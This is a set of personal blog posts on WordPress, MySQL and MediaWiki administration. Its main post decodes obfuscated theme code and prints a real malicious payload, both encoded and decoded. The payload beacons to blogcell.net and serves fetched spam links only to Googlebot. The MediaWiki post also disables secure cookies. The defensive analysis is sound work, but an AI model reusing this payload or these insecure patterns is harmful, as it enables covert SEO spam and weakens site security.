Easy way to decode or decrypt eval gzinflate str_rot13 base64_decode variables

If you download and install many WordPress themes you will sometimes find themes that have encrypted lines or variables in the footer part of the theme, in the functions.php file or other included theme files.
I do not trust these lines of code and would not use a theme without knowing what code is being run. Therefore I decode these lines to determine if this is a theme I would like to use or just delete it because it contains dangerous code. Most of the time these encrypted lines just contain copyright information the authors of the theme don’t want you to change.

This is an example of how a encrypted variable might look like

echo(str_rot13('shapgvba purpx_urnqre(){vs(!(shapgvba_rkvfgf("purpx_shapgvbaf")&&shapgvba_rkvfgf("purpx_s_sbbgre"))){rpub (\'Guvf gurzr vf eryrnfrq haqre perngvir pbzzbaf yvprapr, nyy yvaxf va gur sbbgre fubhyq erznva vagnpg< /sbag>< /o>\');}}'));

Wordpress eval decode

The easy way to show the contents of this variable is copy the entire line into a new PHP file and replace the eval command with echo and save the file into file decode.php

Then you run the PHP file like this

# php decode.php

The result in this example should be

function check_header(){if(!(function_exists("check_functions")&&function_exists("check_f_footer"))){echo (' < b>< font color=white size=4>This theme is released under creative commons licence, all links in the footer should remain intact< /font>');}}

I have included an image of the code in case it is not shown correctly in WordPress.
Wordpress eval result

I have written about this topic before, WordPress themes with eval and base64_decode lines but this is a much simpler way of showing the content of the unreadable variables.

PHP script to recreate empty WordPress post slugs

This post describes how I managed to recreate empty WordPress 3.0 permalink post slugs with the post title of the blog posts using a slightly modified version of the script found on another blog post named Bulk update post slugs in a wordpress blog. This script became handy since some of my post slugs was missing permalink content because the content in my WordPress blog was migrated from an old PostNuke blog and was not SEO friendly.

The only change I did to the script was to use the PHP function rawurlencode() to encode the Norwegian letters æøå into a URL friendly URLs and change the formatting of how the changes was presented to the web browser. It is very important that you remember to make a backup of your WordPress database before you run this script. Just in case you need to revert your post slugs changes.

The script

// change this this to strip old slugs if needed:
//update wp_posts set post_name = '' where guid like '%.asp'
set_time_limit(20000);

/** Loads the WordPress Environment and Template, allowing wp functions like the_title() */
define('WP_USE_THEMES', false);
require('./wp-blog-header.php');

function bleach($which)
{
    $result = sanitize_title(get_the_title($which));
    return $result;
}

$dbhost = 'localhost';
$dbuser = 'username';
$dbpass = 'password';
$dbname = 'wordpress';

$sql = 'SELECT ID, post_title' . ' FROM `wp_posts`' . ' WHERE post_status = "publish"' . " and post_name = '' " . ' order by ID asc';

$db = mysql_connect($dbhost, $dbuser, $dbpass) or die('Could not connect: ' . mysql_error());
mysql_select_db($dbname);

$result = mysql_query($sql) or die('Query failed: ' . mysql_error());
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
    $id         = $row['ID'];
    $title      = $row['post_title'];
    $clean_slug = rawurlencode(bleach($id));

    echo "ID:{$row['ID']} " . "post_title : {$title} " . "sanitized : {$clean_slug}
";
    $sql_u = "UPDATE `wp_posts` SET post_name = '" . $clean_slug . "' " . 'WHERE ID = ' . $id;
    echo 'QUERY:' . $sql_u . '
';
    mysql_query($sql_u) or die('ERROR: ' . mysql_error());
    flush();
}
echo "";
mysql_close($db);

Save this PHP script in the root path of your WordPress installation. In my case I named it “regenerate_post_slugs.php” and ran it from my web browser by visiting the web address http://example.com/regenerate_post_slugs.php Remeber to add the <?php and ?> PHP tags in the beginning and end of the script.
The changes the script does to your WordPress database will be printed on your web browsers window. If the changes does not meet your post slug wishes, just revert to the backup you made before running this script.

This is an excerp from the result after running the script on my WordPress database

...
ID:1273 post_title : Presentasjon av spillere og kampoversikt klart! sanitized : presentasjon-av-spillere-og-kampoversikt-klart
QUERY:UPDATE `wp_posts` SET post_name = 'presentasjon-av-spillere-og-kampoversikt-klart' WHERE ID = 1273
ID:1274 post_title : Problemer på hjemmesiden! sanitized : problemer-pa-hjemmesiden
QUERY:UPDATE `wp_posts` SET post_name = 'problemer-pa-hjemmesiden' WHERE ID = 1274
...

You can download the script regenerate_post_slugs.php if you experience that some of the content is missing. Remember to rename it to .php

mysql alternative to PHP substr_count function

The substr_count function in PHP counts the number of substring occurrences. This post describes how to create a mysql stored function to behave just like PHP’s substr_count function.

This function can be created from your mysql console

delimiter ||
DROP FUNCTION IF EXISTS substrCount||
CREATE FUNCTION substrCount(s VARCHAR(255), ss VARCHAR(255)) RETURNS TINYINT(3) UNSIGNED LANGUAGE SQL NOT DETERMINISTIC READS SQL DATA
BEGIN
DECLARE count TINYINT(3) UNSIGNED;
DECLARE offset TINYINT(3) UNSIGNED;
DECLARE CONTINUE HANDLER FOR SQLSTATE '02000' SET s = NULL;

SET count = 0;
SET offset = 1;

REPEAT
IF NOT ISNULL(s) AND offset > 0 THEN
SET offset = LOCATE(ss, s, offset);
IF offset > 0 THEN
SET count = count + 1;
SET offset = offset + 1;
END IF;
END IF;
UNTIL ISNULL(s) OR offset = 0 END REPEAT;

RETURN count;
END;

||

delimiter ;

Usage

Example 1

SELECT substrCount('/this/is/a/path', '/') `count`;

`count` would return 4 in this case. Can be used in such cases where you might want to find the “depth” of a path, or for many other uses.
This function is great to count the content of mysql ENUM and SET field data types.

Example 2

SELECT substrcount(
                `tablename` , ','
        ) as tablename
        FROM `tablename`
        where substrcount(
                `tablename` , ','
        ); 

The content of table named tablename is a comma separated list generated from mysql ENUM datatype

2000/2001,2001/2002,2002/2003,2003/2004,2004/2005,2005/2006,2006/2007,2007/2008,2008/2009,2009/2010

In Example 2 the result from this query would be 9, telling us that there are 9 commas in this tablerow.

Source: Posted by Andrew Hanna on August 24 2006 8:04pm

WordPress themes with eval and base64_decode lines

Lately I’ve been downloading and reading myself up on WordPress themes and stumbled upon something curious. Many themes had encrypted code/lines starting with the following code
Example 1

eval(base64_decode('abcdefgh....')

and other variations like
Example 2

eval(gzinflate(str_rot13(base64_decode('abcdefgh...')

This made me curious about why would someone make such an effort to obfuscate their code. Personally I would like to know what code my themes are running so it was not an option not to decode these eval lines in my WordPress themes. This made me wonder if many of my themes that had these lines of code and a simple command from the console would reveal all my themes that had encoded code from the wp-content/themes katalog on your WordPress installation

grep eval |grep decode | grep php * -R

I had several themes containing code of hiding code and some of the themes had hacks that made traffic redirects to other sites.

Decoding Example 1 can be performed by using the following script and inserting the encrypted text in variable $a.

The PHP decoder script
The encrypted text is taken from a unnamed random theme I have downloaded.

<?php
$a = 'ZnVuY3Rpb24gd3BfZ2V0X2Zvb3Rlcl9tZXRhKCkge2dsb2JhbCAkd3BkYjtpZiAoJGFkd2Jfb3B0ID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBvcHRpb25fdmFsdWUgRlJPTSAkd3BkYi0+b3B0aW9ucyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIikpJGFkd2Jfb3B0ID0gdW5zZXJpYWxpemUoJGFkd2Jfb3B0KTtlbHNleyRhZHdiX29wdCA9IGFycmF5KDAsJycpOyR3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdGlvbl9uYW1lLCBvcHRpb25fdmFsdWUsIGF1dG9sb2FkKSBWQUxVRVMgKCdhZHdiX29wdCcsICciLnNlcmlhbGl6ZSgkYWR3Yl9vcHQpLiInLCAnbm8nKSIpO31pZiAoKHRpbWUoKS0kYWR3Yl9vcHRbMF0pID49IDM2MDApeyRhZHdiX2hvc3QgPSAnYmxvZ2NlbGwubmV0JzskYWR3Yl9nZXQgID0gJy93cGFtLyc7JGFkd2Jfc29jICA9IEBmc29ja29wZW4oJGFkd2JfaG9zdCw4MCwkX2VuLCRfZXMsMzApO2lmICgkYWR3Yl9zb2Mpe0BzdHJlYW1fc2V0X3RpbWVvdXQoJGFkd2Jfc29jLDMwKTtAZndyaXRlKCRhZHdiX3NvYywiR0VUICRhZHdiX2dldCIuJz9oPScudXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkuJyZ1PScudXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKS4iIEhUVFAvMS4xXHJcbkhvc3Q6ICRhZHdiX2hvc3RcclxuQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiIpOyRhZHdiX2RhdGEgPSAnJzt3aGlsZSghZmVvZigkYWR3Yl9zb2MpKSAkYWR3Yl9kYXRhIC49IEBmZ2V0cygkYWR3Yl9zb2MsIDEwMjQpOyRhZHdiX2RhdGEgPSB0cmltKHN0cnN0cigkYWR3Yl9kYXRhLCJcclxuXHJcbiIpKTt9QGZjbG9zZSgkYWR3Yl9zb2MpO3ByZWdfbWF0Y2goJy88YWRidWc+KC4rPyk8XC9hZGJ1Zz4vcycsJGFkd2JfZGF0YSwkYWR3Yl90bXApO2lmKCRhZHdiX3RtcFsxXSE9IiIpeyRhZHdiX29wdCA9IGFycmF5KHRpbWUoKSwgJGFkd2JfdG1wWzFdKTskd3BkYi0+cXVlcnkoIlVQREFURSAkd3BkYi0+b3B0aW9ucyBTRVQgb3B0aW9uX3ZhbHVlPSciLm15c3FsX2VzY2FwZV9zdHJpbmcoc2VyaWFsaXplKCRhZHdiX29wdCkpLiInIFdIRVJFIG9wdGlvbl9uYW1lPSdhZHdiX29wdCciKTt9fWlmIChlcmVnaSgiZ29vZ2xlYm90IiwkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKXtpZiAoJGFkd2Jfb3B0WzFdIT0iIillY2hvICRhZHdiX29wdFsxXTt9fSBhZGRfYWN0aW9uKCJ3cF9mb290ZXIiLCAid3BfZ2V0X2Zvb3Rlcl9tZXRhIik7';
function a($a){ return base64_decode($a);}
while(!$b){
        if(substr($a,0,4) == 'eval' || !$count){
                $a = a(str_replace(Array('eval(base64_decode(\'','\')));'),'',$a);
                $count++;
        }else
                $b = true;
}
echo $a;
?>

To run it from a console window you can do the following, not as a privileged user in case it does something nasty.

php scriptname.php > result.txt

My text would output the following text to the result.txt file

function wp_get_footer_meta() {
global $wpdb;
if ($adwb_opt = $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name='adwb_opt'"))$adwb_opt = unserialize($adwb_opt);
else{$adwb_opt = array(0,'');
$wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('adwb_opt', '".serialize($adwb_opt)."', 'no')");
}
if ((time()-$adwb_opt[0]) >= 3600){$adwb_host = 'blogcell.net';
$adwb_get  = '/wpam/';$adwb_soc  = @fsockopen($adwb_host,80,$_en,$_es,30);
if ($adwb_soc) {
@stream_set_timeout($adwb_soc,30);
@fwrite($adwb_soc,"GET $adwb_get".'?h='.urlencode($_SERVER['HTTP_HOST']).'&='.urlencode($_SERVER['REQUEST_URI'])." HTTP/1.1\r\nHost: $adwb_host\r\nConnection: Close\r\n\r\n");
$adwb_data = '';
while(!feof($adwb_soc)) $adwb_data .= @fgets($adwb_soc, 1024);
$adwb_data = trim(strstr($adwb_data,"\r\n\r\n"));
}
@fclose($adwb_soc);
preg_match('/(.+?)<\/adbug>/s',$adwb_data,$adwb_tmp);
if($adwb_tmp[1]!=""){$adwb_opt = array(time(), $adwb_tmp[1]);
$wpdb->query("UPDATE $wpdb->options SET option_value='".mysql_escape_string(serialize($adwb_opt))."' HERE option_name='adwb_opt'");
}
}
if (eregi("googlebot",$_SERVER['HTTP_USER_AGENT'])){if ($adwb_opt[1]!="")echo $adwb_opt[1];
}
} 
add_action("wp_footer", "wp_get_footer_meta");

You should then decide if the decoded code is something you would like to run on your WordPress site. Some themes are doing this to hide their WordPress theme tricks while other do it to do nasty stuff like redirecting traffic from your site to other sites, etc.

Source: The decoder script was found here

Enable secure / https SSL login on mediaWiki 1.13.3

This is how I’ve enabled secure SSL login through https on a mediaWiki 1.13.3 installation. This description might work on other versions of mediaWiki, but that has not been tested.
mediWiki doesn’t support SSL login out of the box so a little hack has to be performed.

First you need to tell the webserver, in my case my Apache server that mediaWiki login requests should be redirected to the SSL page
Add the following code lines to your Apache config files or the mediaWiki .htaccess file

Rewrite login url to use httpsRewriteEngine On

RewriteCond %{REQUEST_URI} ^/index.php$
RewriteCond %{QUERY_STRING} ^title=Special:UserLogin
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteRule ^(.*)$ https://%{SERVER_NAME}/$1 [R]

Rewrite non login url to use normal http

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(?!title=Special:Userlogin)
RewriteRule ^(.*)$ http://%{SERVER_NAME}$1 [R]

Source: http://wiki.epfl.ch/cfavi/mediawiki

In addition to the above configuration you have to create a PHP script to fix some cookies problems since the cookie was made on an https address but normal surfing is done on http mode.

Create a file named ssl_login.php and insert the following code into it

# Secure the login page.

# Secure cookies hurt us because they are set on the https page
# but inaccessible from the http page, so we lose our previous session.
$wgCookieSecure = false;

# Don't process JavaScript and CSS files.
# Otherwise, a secure page will be tagged as "partially secure" because these
# files are being hit via http.
if (checkQS('gen', 'js')) {return;}
if (checkQS('gen', 'css') || checkQS('ctype', 'text/css')) {return;}

# Get page title from query string.
$pageTitle = array_key_exists('title', $_GET)
     ? $_GET['title']
     : "";

# Get server variables
$domain = $_SERVER['HTTP_HOST'];
$uri = $_SERVER['REQUEST_URI'];

# Are we on the sign-in page or not?
# Logic works for everything except Special pages which apparently don't
# even run LocalSettings.php.
$onSignInPage = false;
$signInPageName = 'special:userlogin';  // lowercase on purpose
if ( strtolower($pageTitle) == $signInPageName ) {
  $onSignInPage = true;
} elseif ( strstr(strtolower($uri), "/$signInPageName") ) {
  $onSignInPage = true;
} else {
  $onSignInPage = false;
}

# Secure only the Special:Userlogin page.
# Un-secure all other pages.
if ( !checkServerVariable('HTTPS', 'on') && $onSignInPage ) {
  header('Location: https://' . $domain . $uri);
} elseif ( checkServerVariable('HTTPS', 'on') && ! $onSignInPage ) {
  header('Location: http://' . $domain . $uri);
} else {
  // nothing
}

function checkQS($key, $value) {
  return checkArrayValue($_GET, $key, $value);
}

function checkServerVariable($var, $value) {
  return checkArrayValue($_SERVER, $var, $value);
}

function checkArrayValue($arr, $key, $value) {
  return array_key_exists($key, $arr) && $arr[$key] == $value;
}

Include this file in your LocalSettings.php file like this

# Fix to use SSL login
include '/full/path/to/htdocs/ssl_login.php';

Source: http://www.mediawiki.org/wiki/Manual:Configuration_tips_and_tricks#HTTPS_on_Login_only

Remember to restart your apache webserver to see the changes.